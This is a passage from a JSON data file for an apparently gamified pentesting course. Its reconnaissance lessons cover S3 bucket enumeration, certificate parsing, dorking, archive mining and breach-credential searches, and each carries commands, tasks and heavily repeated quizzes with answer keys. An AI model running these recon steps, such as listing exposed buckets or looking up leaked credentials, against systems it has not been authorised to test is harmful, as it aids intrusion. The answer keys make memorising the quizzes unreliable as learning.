means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-scope-validation","cat":"Reconnaissance","title":"Scope Validation Techniques","diff":1,"xp":50,"intro":"Verify that your targets are actually in scope.","sections":[{"type":"text","content":"Before scanning: verify IP ownership (WHOIS, ARIN), confirm domain ownership (WHOIS registrant), check cloud IP allocation (is it shared hosting?), and document everything."},{"type":"code","lang":"bash","content":"whois target.com | grep -iE 'registrant|org'\nwhois 1.2.3.4 | grep -iE 'netname|orgname'\nnslookup target.com  # verify IP matches scope document"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Why verify scope before scanning?","opts":["It's optional","Scanning out-of-scope systems is illegal","To save time","To test faster"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-screenshot-recon","cat":"Reconnaissance","title":"Web Screenshot Reconnaissance","diff":2,"xp":150,"intro":"Capture screenshots of every discovered web service.","sections":[{"type":"text","content":"EyeWitness and gowitness take screenshots of web interfaces. Quickly identify admin panels, default pages, and interesting applications across hundreds of IPs."},{"type":"code","lang":"bash","content":"eyewitness --web -f urls.txt --no-prompt\ngowitness scan -f urls.txt\naquatone < urls.txt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Mass screenshots help find...","opts":["Vulnerabilities","Admin panels and interesting apps across many targets","Passwords","Network topology"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-s3-enum","cat":"Reconnaissance","title":"S3 Bucket Enumeration","diff":2,"xp":150,"intro":"Find and access misconfigured S3 buckets.","sections":[{"type":"text","content":"Brute-force common bucket names, check permissions, and list/download contents."},{"type":"code","lang":"bash","content":"aws s3 ls s3://target-backup --no-sign-request\naws s3 ls s3://target-dev --no-sign-request\n# Automated:\npython3 cloud_enum.py -k target"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Public S3 buckets expose...","opts":["Nothing","Files, backups, and potentially sensitive data","Only metadata","Network configs"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-cert-parsing","cat":"Reconnaissance","title":"SSL Certificate Intelligence","diff":2,"xp":150,"intro":"Extract intelligence from SSL certificates.","sections":[{"type":"text","content":"Certificates contain: organization name, common name, SANs (additional domains), issuer, validity dates, and sometimes internal hostnames."},{"type":"code","lang":"bash","content":"echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -text -noout\n# Extract SANs\necho | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -ext subjectAltName"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SSL SANs reveal...","opts":["Encryption strength","Additional domains/subdomains on the same certificate","Private keys","User passwords"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-network-range","cat":"Reconnaissance","title":"Network Range Discovery","diff":1,"xp":75,"intro":"Determine all IP ranges belonging to the target.","sections":[{"type":"text","content":"ARIN/RIPE lookups, reverse DNS, BGP data, and ASN queries map every IP range."},{"type":"code","lang":"bash","content":"whois -h whois.arin.net 'n target corp'\ncurl -s https://api.bgpview.io/search?query_term=target | jq '.data.asns'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"ARIN/RIPE databases contain...","opts":["Vulnerabilities","IP range allocations per organization","Passwords","Source code"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-search-engine","cat":"Reconnaissance","title":"Search Engine Dorking","diff":1,"xp":75,"intro":"Use advanced search operators for OSINT.","sections":[{"type":"text","content":"Google, Bing, and DuckDuckGo support operators: site:, intitle:, filetype:, inurl: to find exposed files and pages."},{"type":"code","lang":"bash","content":"site:target.com filetype:pdf\nintitle:'index of' site:target.com\nsite:target.com inurl:admin\n'target corp' filetype:xlsx"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"site: operator restricts results to...","opts":["All sites","A specific domain","A specific file type","A specific title"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-archive-mining","cat":"Reconnaissance","title":"Web Archive Mining","diff":2,"xp":150,"intro":"Find old/deleted content in web archives.","sections":[{"type":"text","content":"Wayback Machine stores historical snapshots. Old pages may contain: removed endpoints, leaked credentials, debug info, and decommissioned APIs."},{"type":"code","lang":"bash","content":"waybackurls target.com | grep -iE 'api|admin|config|backup|secret|key'\ncurl -s 'http://web.archive.org/cdx/search/cdx?url=target.com/*&output=text&fl=original' | sort -u"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Web archives contain...","opts":["Only current pages","Historical snapshots including deleted/changed content","Real-time data","Encrypted pages"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-leaked-creds","cat":"Reconnaissance","title":"Credential Breach Searching","diff":3,"xp":200,"intro":"Search breach databases for target email credentials.","sections":[{"type":"text","content":"Breach databases contain billions of leaked email/password pairs. Finding a match reveals password patterns and potentially valid credentials."},{"type":"code","lang":"bash","content":"h8mail -t user@target.com\nh8mail -t @target.com --breach-comp\n# Check haveibeenpwned.com\n# Check dehashed.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Breach databases help attackers because...","opts":["They contain fake data","People reuse passwords across services","They're encrypted","They only contain old data"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network 